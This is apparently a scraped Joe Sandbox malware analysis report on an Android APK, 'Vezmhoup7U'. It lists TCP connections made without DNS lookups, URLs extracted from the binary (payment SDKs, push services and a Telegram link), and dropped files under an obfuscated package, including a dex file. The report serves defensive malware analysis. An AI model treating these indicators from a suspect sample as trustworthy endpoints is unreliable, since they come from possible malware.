Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.10
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.234
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.80.4
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.35

Source: DefaultAppConfiguration	String found in binary or memory: http://api.waimai.meituan.com
Source: hmsincas.bks	String found in binary or memory: http://cpki-caweb.huawei.com/cpki/servlet/crlFileDown.crl?certype=1&/rootcrl.crl0
Source: classes.dex, android	String found in binary or memory: http://m.alipay.com/?action=h5quit
Source: classes.dex	String found in binary or memory: http://m.alipay.com/?action=h5quit/http://mclient.alipay.com/cashier/mobilepay.htm2http://mclient.al
Source: classes.dex, android	String found in binary or memory: http://mclient.alipay.com/cashier/mobilepay.htm
Source: classes.dex, android	String found in binary or memory: http://mclient.alipay.com/home/exterfaceAssign.htm
Source: classes.dex, android	String found in binary or memory: http://mclient.alipay.com/service/rest.htm
Source: classes.dex	String found in binary or memory: http://mclient.alipay.com/service/rest.htmJhttp://mobile.unionpay.com/getclient?platform=android&typ
Source: classes.dex	String found in binary or memory: http://mobile.unionpay.com/getclient?platform=android&type=securepayplugin
Source: classes.dex, android	String found in binary or memory: http://mobilegw-1-64.test.alipay.net/mgw.htm
Source: classes.dex	String found in binary or memory: http://mobilegw-1-64.test.alipay.net/mgw.htm&http://mobilegw.aaa.alipay.net/mgw.htm)http://mobilegw.
Source: classes.dex, android	String found in binary or memory: http://mobilegw.aaa.alipay.net/mgw.htm
Source: classes.dex, android	String found in binary or memory: http://mobilegw.stable.alipay.net/mgw.htm
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/2102f5c663d6145c330b8d25f3330bc2375.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/26bad7bfbb8cea766bdbc9c38e9487f2330.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/48b4dd3bf6dc55fc4e7762a98a0f928c11327.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/5bd94bb10e0d4717bca6b2301798927612152.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/70dcf3187a1952c2a16721e26cf0e95c13021.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/a5ab11ef4c6e755261b5645ba3cf05d21163.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/ca573fc7cf6682129ca700bb6faaeaab394.png
Source: image_url_mapping	String found in binary or memory: http://p0.meituan.net/metplatformwhale/d21a37f1de544aa842727b85d26428f656797.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/162f0a4bd78f9ad84ee3022e9be37f7117825.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/6ae04ce47421542eb3c353280d458335433.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/86b21891c97dd11332873aa2fbee58041214.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/873f3060be1dd20a048601af42629804326.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/8dc911aca0bd1d076e9eee5f6fb22c43573.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/c1050ac69bbc1ae47b8db44056f14cd131606.png
Source: image_url_mapping	String found in binary or memory: http://p1.meituan.net/metplatformwhale/ee814226f585d7f19ed5ae684385a7871237.png
Source: a.xml, AndroidManifest.xml	String found in binary or memory: http://schemas.android.com/apk/res/android
Source: classes.dex, android	String found in binary or memory: http://wappaygw.alipay.com/service/rest.htm
Source: classes.dex	String found in binary or memory: http://wappaygw.alipay.com/service/rest.htm:http://xmlpull.org/v1/doc/features.html#process-namespac
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170627151445dongjing.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170627151736shouer.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170627151802daban.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170627151817jingdu.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170705162803bangkok.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170712211404singapore.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170905184843hanguo.png
Source: foreigncities.json	String found in binary or memory: http://www.dpfile.com/sc/eleconfig/20170905185004dongjing.png
Source: classes.dex, android	String found in binary or memory: http://xmlpull.org/v1/doc/features.html#process-namespaces
Source: classes.dex, android	String found in binary or memory: https://%1$s/gslb/?ver=5.0
Source: classes.dex	String found in binary or memory: https://%1$s/gslb/?ver=5.0%https://cn.register.xmpush.xiaomi.com
Source: web-holder.html	String found in binary or memory: https://awp.meituan.com/hfe/fep/aedec8031d714fd5a4128e94a6cf1e9f.html
Source: wxjs.js	String found in binary or memory: https://catfront.dianping.com/api/metric?p=com.sankuai.mmp.fe.framework&v=1
Source: classes.dex, android	String found in binary or memory: https://cn.register.xmpush.xiaomi.com
Source: grs_sdk_global_route_config_opendevicesdk.json	String found in binary or memory: https://data-dra.push.dbankcloud.com
Source: grs_sdk_global_route_config_opendevicesdk.json	String found in binary or memory: https://data-drcn.push.dbankcloud.com
Source: grs_sdk_global_route_config_opendevicesdk.json	String found in binary or memory: https://data-dre.push.dbankcloud.com
Source: grs_sdk_global_route_config_opendevicesdk.json	String found in binary or memory: https://data-drru.push.dbankcloud.com
Source: classes.dex, android	String found in binary or memory: https://e.hh-medic.com
Source: classes.dex, android	String found in binary or memory: https://g-zt.kwai-pro.com
Source: classes.dex	String found in binary or memory: https://g-zt.kwai-pro.com(https://h5.m.taobao.com/mlapp/olist.htmlJhttps://imgfamily.hh-medic.com/me
Source: classes.dex, android	String found in binary or memory: https://github.com/facebook/react-native/wiki/Breaking-Changes#d4611211-reactnativeandroidbreaking-m
Source: grs_sdk_server_config.json	String found in binary or memory: https://grs.dbankcloud.asia
Source: grs_sdk_server_config.json	String found in binary or memory: https://grs.dbankcloud.cn
Source: grs_sdk_server_config.json	String found in binary or memory: https://grs.dbankcloud.com
Source: grs_sdk_server_config.json	String found in binary or memory: https://grs.dbankcloud.eu
Source: classes.dex, android	String found in binary or memory: https://h5.m.taobao.com/mlapp/olist.html
Source: lbs_bus_homepage_default_config.json	String found in binary or memory: https://i.meituan.com/awp/quic/bus-realtime-fe/route-plan-list.html?notitlebar=1
Source: lbs_bus_homepage_default_config.json	String found in binary or memory: https://i.meituan.com/awp/quic/bus/user-center.html?notitlebar=1
Source: classes.dex, android	String found in binary or memory: https://imgfamily.hh-medic.com/medic-collage/20210726/hp_line_up_image.jpg
Source: classes.dex, android	String found in binary or memory: https://imgs.hh-medic.com/video/001/calling.mp3
Source: wxjs.js	String found in binary or memory: https://km.sankuai.com/collabpage/1715550785
Source: classes.dex, android	String found in binary or memory: https://loggw-exsdk.alipay.com/loggw/logUpload.do
Source: classes.dex, android	String found in binary or memory: https://mcgw.alipay.com/sdklog.do
Source: classes.dex	String found in binary or memory: https://mcgw.alipay.com/sdklog.do0https://mclient.alipay.com/cashier/mobilepay.htm3https://mclient.a
Source: classes.dex, android	String found in binary or memory: https://mclient.alipay.com/cashier/mobilepay.htm
Source: classes.dex, android	String found in binary or memory: https://mclient.alipay.com/home/exterfaceAssign.htm
Source: classes.dex, android	String found in binary or memory: https://mclient.alipay.com/home/exterfaceAssign.htm?
Source: classes.dex, android	String found in binary or memory: https://mclient.alipay.com/service/rest.htm
Source: classes.dex	String found in binary or memory: https://mclient.alipay.com/service/rest.htm#https://mobilegw.alipay.com/mgw.htm&https://mobilegw.ali
Source: grs_sdk_global_route_config_opensdkService.json	String found in binary or memory: https://metrics-dra.dt.hicloud.com:6447
Source: grs_sdk_global_route_config_opensdkService.json	String found in binary or memory: https://metrics1.data.hicloud.com:6447
Source: grs_sdk_global_route_config_opensdkService.json	String found in binary or memory: https://metrics2.data.hicloud.com:6447
Source: grs_sdk_global_route_config_opensdkService.json	String found in binary or memory: https://metrics5.data.hicloud.com:6447
Source: classes.dex	String found in binary or memory: https://mobile.unionpay.com/getclient?platform=android&type=securepayplugin
Source: classes.dex, android	String found in binary or memory: https://mobilegw.alipay.com/mgw.htm
Source: classes.dex, android	String found in binary or memory: https://mobilegw.alipaydev.com/mgw.htm
Source: NOTICE	String found in binary or memory: https://mozilla.org/MPL/2.0/
Source: order_banner.xml	String found in binary or memory: https://p0.meituan.net/travelcube/23608f47cd2f57e540e9c9525a4363ca3285.png
Source: mine_wallet.xml	String found in binary or memory: https://p0.meituan.net/travelcube/5e267eef0f37efcfa1c784d0890865b9370.png
Source: mine_wallet.xml	String found in binary or memory: https://p0.meituan.net/travelcube/7e12d3b1d16366e4749ea4fe9a9123ac480.png
Source: couponPackage.xml	String found in binary or memory: https://p1.meituan.net/scarlett/2265a53c3be340bb8cc6837f52d85041225.png
Source: packageSale.xml	String found in binary or memory: https://p1.meituan.net/scarlett/5b38551088d61b7b1a602c509432a65b767.png
Source: NOTICE	String found in binary or memory: https://publicsuffix.org/list/public_suffix_list.dat
Source: classes.dex, android	String found in binary or memory: https://resolver.msg.xiaomi.net/psc/?t=a
Source: sodler.json	String found in binary or memory: https://s2-10924.kwimgs.com/kos/nlav10924/temp-arm-64_33baaad306f233e86da2215fd0c5fa95.zip
Source: sodler.json	String found in binary or memory: https://s2-10924.kwimgs.com/kos/nlav10924/temp-arm-v7_d4c5e7a0f6e3db66d5e572e8ab29bde7.zip
Source: classes.dex, android	String found in binary or memory: https://sdk01.hh-medic.com/familyapp
Source: classes.dex, android	String found in binary or memory: https://sec.hh-medic.com/orderapp
Source: grs_sdk_global_route_config_apptouchupdatesdk.json	String found in binary or memory: https://store-at-dre.hispace.dbankcloud.com/hwmarket/api/
Source: c.json	String found in binary or memory: https://t.me/n3w3rras
Source: classes.dex, android	String found in binary or memory: https://test.hh-medic.com
Source: classes.dex	String found in binary or memory: https://test.hh-medic.com#https://test.hh-medic.com/familyapp
Source: classes.dex, android	String found in binary or memory: https://test.hh-medic.com/familyapp
Source: classes.dex, android	String found in binary or memory: https://vod.streamlakeapi.com
Source: classes.dex	String found in binary or memory: https://vod.streamlakeapi.com5https://wappaygw.alipay.com/home/exterfaceAssign.htm?
Source: classes.dex, android	String found in binary or memory: https://wappaygw.alipay.com/home/exterfaceAssign.htm?
Source: classes.dex, android	String found in binary or memory: https://wappaygw.alipay.com/service/rest.htm
Source: classes.dex	String found in binary or memory: https://wappaygw.alipay.com/service/rest.htm4huawei

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Android Analysis Report Vezmhoup7U

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel

Yara Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

Change of System Appearance

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex/lkfupve.gvo

/data/user/0/com.mtnyrvojt.qtbxtwjnq/files/rnscus.huv

Static File Info

General

File Icon

Static APK Info

General

Activities

Receivers

Services

Permission Requested

Certificate

Resources

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

Android Analysis Report
Vezmhoup7U